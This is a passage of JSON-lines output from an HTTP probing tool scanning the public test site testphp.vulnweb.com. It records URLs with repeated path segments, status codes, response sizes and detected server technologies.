}\n{\"timestamp\":\"2024-11-13T02:23:41.698915795Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/listproducts.php?cat=3\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/listproducts.php?cat=3\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/listproducts.php?cat=3\",\"time\":\"343.540744ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:41.911242783Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/listproducts.php?cat=4\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/listproducts.php?cat=4\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/listproducts.php?cat=4\",\"time\":\"349.72754ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:45.132764256Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/login.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/login.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/login.php\",\"time\":\"355.960401ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:45.229484341Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/privacy.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/privacy.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/privacy.php\",\"time\":\"351.249094ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:45.317855067Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/style.css\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/style.css\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/style.css\",\"time\":\"344.559961ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:45.381028101Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/userinfo.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/userinfo.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/userinfo.php\",\"time\":\"350.997343ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:45.746718265Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/index.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/index.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/index.php\",\"time\":\"344.985867ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:46.114297148Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/artists.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/artists.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/artists.php\",\"time\":\"354.15442ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:46.12044574Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/cart.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/cart.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/cart.php\",\"time\":\"347.767356ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:46.373562691Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/categories.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/categories.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/categories.php\",\"time\":\"340.776793ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:46.91593366Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/disclaimer.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/disclaimer.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/disclaimer.php\",\"time\":\"357.817108ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:47.050527291Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/guestbook.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/guestbook.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/guestbook.php\",\"time\":\"353.567238ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:48.709121858Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/index.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/index.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/index.php\",\"time\":\"340.433088ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:49.789364743Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/listproducts.php?cat=1\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/listproducts.php?cat=1\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/listproducts.php?cat=1\",\"time\":\"351.809281ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:50.072290634Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/listproducts.php?cat=2\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/listproducts.php?cat=2\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/listproducts.php?cat=2\",\"time\":\"349.588129ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:50.365058736Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/listproducts.php?cat=3\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/listproducts.php?cat=3\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/listproducts.php?cat=3\",\"time\":\"350.588227ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:51.10543354Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/listproducts.php?cat=4\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/listproducts.php?cat=4\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/listproducts.php?cat=4\",\"time\":\"344.937626ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:51.139656711Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/login.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/login.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/login.php\",\"time\":\"343.761897ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:51.203139997Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/privacy.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/privacy.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/privacy.php\",\"time\":\"361.949522ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:51.219726826Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/style.css\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/style.css\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/style.css\",\"time\":\"351.675975ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:51.265573801Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/userinfo.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/userinfo.php\",\"title\":\"picture 